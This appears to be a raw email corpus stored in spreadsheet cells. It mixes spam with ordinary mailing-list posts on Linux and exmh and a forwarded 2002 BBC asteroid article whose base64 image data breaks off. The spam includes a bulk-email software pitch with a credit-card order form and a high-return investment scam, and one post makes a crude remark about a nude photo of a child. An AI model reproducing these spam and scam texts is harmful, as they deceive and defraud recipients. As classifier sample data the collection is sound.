  100,000 off the disk you sent with the software and the response
  we have had is just FANTASTIC!!  Our visits and sales are nearly
  at an all time high!"
  = A. FREEMAN - England, UK
 "I have received over 1200 visitors today and that was only
  sending out to 10,000 email addresses!"
  = K. SWIFT - Gunnison, CO
 "I'm a happy customer of a few years now.  Thanks a lot....I love
  this program.."
  = S. GALLAGHER - Melville, NY
 "Thanks for your prompt filing of my order for your broadcast email
  software -- it took only about a day.  This is faster than ANYBODY
  I have ever ordered something from!  Thanks again!"
  = W. INGERSOLL - Scottsdale, AZ
 "I feel very good about referring the folks I have sent to you
  thus far and will continue to do so.  It is rare to find a company
  that does business this way anymore...it is greatly appreciated."
  = T. BLAKE - Phoenix, AZ
 "Your software is a wonderful tool! A++++"
  = S. NOVA - Los Angeles, CA
 "Thank you for providing such a fantastic product."
  = M. LOPEZ - Tucson, AZ
 "Your tech support is the best I have ever seen!"
  = G. GONZALEZ - Malibu, CA
 "I am truly impressed with the level of service.  I must admit I
  was a bit skeptical when reading your ad but you certainly deliver!"
  = I. BEAUDOIN - Toronto, ON
 "My first go round gave me $3000 to $4000 in business in less than
  one week so I must thank your company for getting me started."
  = A. ROBERTS - San Francisco, CA
 "We are really happy with your Email program.  It has increased
  our business by about 500%."
  = M. JONES - Vancouver, BC
 "IT REALLY WORKS!!!!!  Thank you thank you, thank you."
  = J. BECKLEY - Cupertino, CA
 ----- ---- --- -- -  -
 [SOUND TOO GOOD TO BE TRUE?]
 ** If you Broadcast Email to 500,000 Internet Users Daily...
 ** Do you think that maybe 1 of 5,000 may order?
 =&gt; If so... That is 100 EXTRA (COST-FREE) ORDERS EVERY DAY!!
 Remember.. You have 90 DAYS to use our Broadcast Email Package
 for FREE and SEE IF IT WORKS FOR YOU!
 If YOU are not 100% COMPLETELY SATISFIED, SIMPLY RETURN the
 Broadcast Email Package to us within 90 DAYS for a FULL REFUND!
 --- -- -  -
 [BROADCAST EMAIL SOFTWARE PACKAGE]: Easy Ordering Instructions
 ==================================================================
 =&gt; Once your order is received we will IMMEDIATELY RUSH out the
 =&gt; Broadcast Email Package on CD-ROM to you via FEDEX PRIORITY
 =&gt; OVERNIGHT or PRIORITY INTERNATIONAL the SAME DAY =&gt; FREE!!
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY PHONE]:
 To order our Broadcast Email Software Package by phone with
 a Credit Card or if you have any additional questions, please 
 call our Sales Department M-F from 8am to 5pm PST in the USA at:
 =&gt; (888)6-NEUPORT / (888)663-8767 or NON-USA at: (541)482-1285
 ** ALL Major Credit Cards are Accepted!
 To Be REMOVED From Our Email List in the USA Call: (888)352-5443
 NON-USA Residents or to FAX Your Remove Request Call: (240)526-6546
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY FAX]:
 To order our Broadcast Email Software Package by fax with a Credit
 Card, please print out the order form at the bottom of this email
 and complete all necessary blanks.  Then, fax the completed order
 form to:
 =&gt; (541)482-1315
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY POSTAL MAIL]:
 To order our Broadcast Email Software Package with a Cashiers
 Check, Credit Card, US Money Order, US Personal Check, or US Bank
 Draft by postal mail, please print out the order form at the
 bottom of this email and complete all necessary blanks.
 Then, send it along with payment of U.S. $295.00 postmarked by
 Friday, June 29th, or $499.00 after Friday, June 29th to:
 NIM Corporation
 1314-B Center Drive #514
 Medford, OR 97501
 United States of America
 ----- ---- --- -- -  -
 "OVER 20,000 BUSINESSES come on the Internet EVERY single day...
 If you don't send out Broadcast Email... YOUR COMPETITION WILL!"
 ------- ------ ----- ---- --- -- -  -
 [Broadcast Email Software Package]: ORDER FORM
 (c)1997-2001 NIM Corporation.  All Rights Reserved
 ==================================================================
 Company Name: ____________________________________________________
 Your Name: _______________________________________________________
 BILLING ADDRESS: _________________________________________________
 City: ________________________ State/Province: ___________________
 Zip/Postal Code: _______________ Country: ________________________
 NON POBOX SHIPPING ADDRESS: ______________________________________
 City: ________________________ State/Province: ___________________
 Zip/Postal Code: _______________ Country: ________________________
 Phone Number: ___________________ Fax Number: ____________________
 Email Address: ___________________________________________________
 ** To Purchase by Credit Card, Please Complete the Following:
 Visa [ ]  Mastercard [ ]  AmEx [ ]  Discover [ ]  Diners Club [ ]
 Name on Credit Card: _____________________________________________
 CC Number: _________________________________ Exp. Date: __________
 Amount to Charge Credit Card ($295.00 or $499.00):  ______________
 Signature: _______________________________________________________
 ==================================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: gaim official rpm repository
</t>
  </si>
  <si>
    <t xml:space="preserve">gaim official apt-rpm repositorys :)
 #gaim
 rpm http://gaim.sourceforge.net/apt redhat/7.3/en/i386 release
 rpm-src http://gaim.sourceforge.net/apt redhat/7.3/en/i386 release
 thought i should post that one too just fell over it :)
 bye,
 che
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Build a great future
</t>
  </si>
  <si>
    <t xml:space="preserve">Easy 30-50% Return?
 Learn how you can receive a monthly check for 3, 4, or 5%
 a month until your initial investment is paid off...then a
 monthly check for over 4% a month for years to come...
 We know it sounds impossible, but it's happening today.
 For complete information on this 
 multi-trillion dollar industry:
 http://www.page4life.org/users/69chevelle/
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To Opt Out:
 Please go to our "OPT OUT" website:
 http://www.page4life.org/users/69chevelle/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re:[1]Save over $70 on this exquisite software suite. FTS
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 8 Oct 2002, John Moylan wrote:
 &gt; Hmm, speaking of cheap machines etc, has anyone tried this sort of
 &gt; thing: http://www.mini-itx.com/projects/humidor64/ ? or more importantly
 &gt; has anyone had any positive/negative experiences with the Via mini-itx
 &gt; boards/via c3 processors.
 My laptop has a Via C3 processor. I use Debian with a self-compiled
 2.4.19 kernel, and have had absolutely no problems with the chip at all
 (quite the opposite, in fact).
 I had to compile for "686" in order for 3D acceleration to work (the
 kernel has an option specifically for the Via C3), but I assume that was
 a kernel problem rather than a hardware problem.
 Trevor Johnston
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002, CDale wrote:
 --]Leave it to Tom to put the one w/ his son's wanker in the center.
 Heck, why hide perfection:)- No bias here, nope none whatsoever.
 Ill have to snap another nudie of him in a few days to show off his
 bodymodification (snip snip circ circ). I even had an empty chair
 present:)-
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">In article &lt;E17tS0T-0001zD-00@rds059&gt; you write:
 &gt;&gt;&gt;&gt; Patrick Salsbury writes:
 &gt;
 &gt;  Patrick&gt; One of the features I really like about exmh is the
 &gt;  Patrick&gt; ability to see which folders have unseen messages in
 &gt;  Patrick&gt; them, but recently, it seems to have vanished into the
 &gt;  Patrick&gt; bowels of my window manager in a place I can't get
 &gt;  Patrick&gt; to. It claims to be running, but doesn't appear
 &gt;  Patrick&gt; anywhere onscreen. (I'm using Enlightenment with a 2x2
 &gt;  Patrick&gt; virtual desktop. I've tried dropping it to only 1
 &gt;  Patrick&gt; screen. No help.)
 &gt;  Patrick&gt;
 &gt;
 &gt;This may not help/work but I've discovered recently that
 &gt;Alt-middle-mouse pops up a list of all of my windows.  If I leave
 &gt;my mouse on the background, it lists Alt-middle-mouse as "Display
 &gt;Task List Menu".
 &gt;
 &gt;HTH,
 &gt;
 &gt;- Bill
 	When I do that, it just moves my mouse to the very edge of a window
 (probably trying to center it on the off-screen window in question.) 
 	I'll have to try it with another window manager and see if I can
 get exmh to put it back inside of sane boundaries. I don't have this
 problem with any other windows, though. Just the exmhunseen window.
 Pat
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Asteroids anyone ?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_001_0010_01C23362.3939B510"
 ------=_NextPart_001_0010_01C23362.3939B510
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Not the computer game but .......
 http://news.bbc.co.uk/1/hi/sci/tech/2147879.stm
 Wednesday, 24 July, 2002, 02:29 GMT 03:29 UK=20
 Space rock 'on collision course'
 =20
 An asteroid could devastate Earth
      =20
      =20
       By Dr David Whitehouse=20
       BBC News Online science editor =20
     =20
     =20
 An asteroid discovered just weeks ago has become the most threatening =
 object yet detected in space.=20
 A preliminary orbit suggests that 2002 NT7 is on an impact course with =
 Earth and could strike the planet on 1 February, 2019 - although the =
 uncertainties are large.=20
 Astronomers have given the object a rating on the so-called Palermo =
 technical scale of threat of 0.06, making NT7 the first object to be =
 given a positive value.=20
 &gt;&gt;From its brightness, astronomers estimate it is about two kilometres =
 wide, large enough to cause continent-wide devastation on Earth.=20
 Many observations=20
 Although astronomers say the object definitely merits attention, they =
 expect more observations to show it is not on an Earth-intersecting =
 trajectory.=20
       This asteroid has now become the most threatening object in the =
 short history of asteroid detection=20
     =20
       Dr Benny Peiser =20
 It was first seen on the night of 5 July, picked up by the Linear =
 Observatory's automated sky survey programme in New Mexico, US.=20
 Since then astronomers worldwide have been paying close attention to it, =
 amassing almost 200 observations in a few weeks.=20
 Could it be deflected?=20
 Dr Benny Peiser, of Liverpool John Moores University in the UK, told BBC =
 News Online that "this asteroid has now become the most threatening =
 object in the short history of asteroid detection".=20
 NT7 circles the Sun every 837 days and travels in a tilted orbit from =
 about the distance of Mars to just within the Earth's orbit.=20
 Potential devastation=20
 Detailed calculations of NT7's orbit suggest many occasions when its =
 projected path through space intersects the Earth's orbit.=20
 Researchers estimate that on 1 February, 2019, its impact velocity on =
 the Earth would be 28 km a second - enough to wipe out a continent and =
 cause global climate changes.=20
 However, Dr Peiser was keen to point out that future observations could =
 change the situation.=20
 He said: "This unique event should not diminish the fact that additional =
 observations in coming weeks will almost certainly - we hope - eliminate =
 the current threat."=20
 Easily observable=20
 According to astronomers, NT7 will be easily observable for the next 18 =
 months or so, meaning there is no risk of losing the object.=20
 Observations made over that period - and the fact that NT7 is bright =
 enough that it is bound to show up in old photographs - mean that =
 scientists will soon have a very precise orbit for the object.=20
 Dr Donald Yeomans, of the US space agency's (Nasa) Jet Propulsion =
 Laboratory in California, told BBC News Online: "The orbit of this =
 object is rather highly inclined to the Earth's orbit so it has been =
 missed because until recently observers were not looking for such =
 objects in that region of space."=20
 Regarding the possibility of an impact, Dr Yeomans said the =
 uncertainties were large.=20
 "The error in our knowledge of where NT7 will be on 1 February, 2019, is =
 large, several tens of millions of kilometres," he said.=20
 Dr Yeomans said the world would have to get used to finding more objects =
 like NT7 that, on discovery, look threatening, but then become harmless. =
 "This is because the problem of Near-Earth Objects is now being properly =
 addressed," he said.=20
 ------=_NextPart_001_0010_01C23362.3939B510
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Not the computer game but =
 .......&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;A=20
 href=3D"http://news.bbc.co.uk/1/hi/sci/tech/2147879.stm"&gt;http://news.bbc.=
 co.uk/1/hi/sci/tech/2147879.stm&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;SPAN class=3Ddate&gt;&lt;FONT face=3DArial size=3D1&gt;Wednesday, 24 July, =
 2002, 02:29=20
 GMT 03:29 UK &lt;/FONT&gt;&lt;/SPAN&gt;
 &lt;DIV class=3Dheadlinestory&gt;&lt;B&gt;Space rock 'on collision =
 course'&lt;/B&gt;&lt;BR&gt;&lt;/DIV&gt;
 &lt;DIV class=3Dinlineimage&gt;&lt;IMG height=3D180 alt=3D"Nasa simulation"=20
 src=3D"http://news.bbc.co.uk/olmedia/1640000/images/_1644899_aster300.jpg=
 "=20
 width=3D300 border=3D0&gt;=20
 &lt;DIV class=3Dcaption&gt;&lt;FONT size=3D1&gt;An asteroid could devastate=20
 Earth&lt;/FONT&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;FONT class=3Dbody face=3Dsans-serif =
 size=3D2&gt;
 &lt;DIV class=3Dbodytext&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D315 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=3D2 alt=3D"" =
 src=3D"http://news.bbc.co.uk/furniture/nothing.gif"=20
       width=3D310 border=3D0&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=3D2 alt=3D"" =
 src=3D"http://news.bbc.co.uk/furniture/nothing.gif"=20
       width=3D5 border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dtop&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dbottom rowSpan=3D2&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dbottom&gt;&lt;SPAN class=3DbylineAuthor&gt;By Dr David =
 Whitehouse=20
       &lt;/SPAN&gt;&lt;BR&gt;&lt;SPAN class=3DbylineDescription&gt;BBC News Online science =
 editor=20
       &lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2&gt;&lt;IMG height=3D1 hspace=3D0=20
       src=3D"http://news.bbc.co.uk/furniture/grey_pixel.gif" width=3D315 =
   border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2&gt;&lt;IMG height=3D7 hspace=3D0=20
       src=3D"http://news.bbc.co.uk/furniture/nothing.gif" width=3D315=20
   border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;An asteroid discovered just weeks =
 ago has=20
 become the most threatening object yet detected in space.=20
 &lt;P&gt;A preliminary orbit suggests that 2002 NT7 is on an impact course =
 with Earth=20
 and could strike the planet on 1 February, 2019 - although the =
 uncertainties are=20
 large.=20
 &lt;P&gt;Astronomers have given the object a rating on the so-called Palermo =
 technical=20
 scale of threat of 0.06, making NT7 the first object to be given a =
 positive=20
 value.=20
 &lt;P&gt;From its brightness, astronomers estimate it is about two kilometres =
 wide,=20
 large enough to cause continent-wide devastation on Earth.=20
 &lt;P&gt;&lt;B&gt;Many observations&lt;/B&gt;=20
 &lt;P&gt;Although astronomers say the object definitely merits attention, they =
 expect=20
 more observations to show it is not on an Earth-intersecting trajectory. =
 &lt;P&gt;&lt;!-- GENInlineBOX --&gt;
 &lt;TABLE class=3Dboxbody cellSpacing=3D0 cellPadding=3D3 width=3D150 =
 align=3Dright=20
 bgColor=3D#ffffcc border=3D0&gt;&lt;!-- GENInlineQUOTE --&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=3D18 alt=3D""=20
       src=3D"http://news.bbc.co.uk/nol/shared/img/startquote.gif" =
 width=3D23=20
       border=3D0 valign=3D"TOP"&gt;&lt;BR&gt;
       &lt;DIV class=3Dboxbody&gt;This asteroid has now become the most =
 threatening=20
       object in the short history of asteroid detection &lt;/DIV&gt;&lt;IMG =
 height=3D18=20
       alt=3D"" src=3D"http://news.bbc.co.uk/nol/shared/img/endquote.gif" =
 width=3D23=20
       align=3Dright border=3D0 valign=3D"ABSBOTTOM"&gt;&lt;BR =
 clear=3Dall&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- GENInlineNAME --&gt;
   &lt;TR&gt;
     &lt;TD bgColor=3D#cccc99&gt;
       &lt;DIV class=3Dboxhead&gt;Dr Benny Peiser =
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;It was first=20
 seen on the night of 5 July, picked up by the Linear Observatory's =
 automated sky=20
 survey programme in New Mexico, US.=20
 &lt;P&gt;Since then astronomers worldwide have been paying close attention to =
 it,=20
 amassing almost 200 observations in a few weeks.=20
 &lt;P&gt;
 &lt;DIV class=3Dbulletheadline&gt;&lt;A=20
 href=3D"http://news.bbc.co.uk/1/hi/sci/tech/2148924.stm"&gt;Could it be =
 deflected?=20
 &lt;/A&gt;&lt;/DIV&gt;
 &lt;P&gt;Dr Benny Peiser, of Liverpool John Moores University in the UK, told =
 BBC News=20
 Online that "this asteroid has now become the most threatening object in =
 the=20
 short history of asteroid detection".=20
 &lt;P&gt;NT7 circles the Sun every 837 days and travels in a tilted orbit from =
 about=20
 the distance of Mars to just within the Earth's orbit.=20
 &lt;P&gt;&lt;B&gt;Potential devastation&lt;/B&gt;=20
 &lt;P&gt;Detailed calculations of NT7's orbit suggest many occasions when its=20
 projected path through space intersects the Earth's orbit.=20
 &lt;P&gt;Researchers estimate that on 1 February, 2019, its impact velocity on =
 the=20
 Earth would be 28 km a second - enough to wipe out a continent and cause =
 global=20
 climate changes.=20
 &lt;P&gt;However, Dr Peiser was keen to point out that future observations =
 could=20
 change the situation.=20
 &lt;P&gt;He said: "This unique event should not diminish the fact that =
 additional=20
 observations in coming weeks will almost certainly - we hope - eliminate =
 the=20
 current threat."=20
 &lt;P&gt;&lt;B&gt;Easily observable&lt;/B&gt;=20
 &lt;P&gt;According to astronomers, NT7 will be easily observable for the next =
 18=20
 months or so, meaning there is no risk of losing the object.=20
 &lt;P&gt;Observations made over that period - and the fact that NT7 is bright =
 enough=20
 that it is bound to show up in old photographs - mean that scientists =
 will soon=20
 have a very precise orbit for the object.=20
 &lt;P&gt;Dr Donald Yeomans, of the US space agency's (Nasa) Jet Propulsion =
 Laboratory=20
 in California, told BBC News Online: "The orbit of this object is rather =
 highly=20
 inclined to the Earth's orbit so it has been missed because until =
 recently=20
 observers were not looking for such objects in that region of space."=20
 &lt;P&gt;Regarding the possibility of an impact, Dr Yeomans said the =
 uncertainties=20
 were large.=20
 &lt;P&gt;"The error in our knowledge of where NT7 will be on 1 February, 2019, =
 is=20
 large, several tens of millions of kilometres," he said.=20
 &lt;P&gt;Dr Yeomans said the world would have to get used to finding more =
 objects like=20
 NT7 that, on discovery, look threatening, but then become harmless.=20
 &lt;P&gt;"This is because the problem of Near-Earth Objects is now being =
 properly=20
 addressed," he said.=20
 &lt;P&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_001_0010_01C23362.3939B510--
 ------=_NextPart_000_000F_01C23362.3939B510
 Content-Type: image/jpeg;
 	name="_1644899_aster300.jpg"
 Content-Transfer-Encoding: base64
 Content-Location: http://news.bbc.co.uk/olmedia/1640000/images/_1644899_aster300.jpg
 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
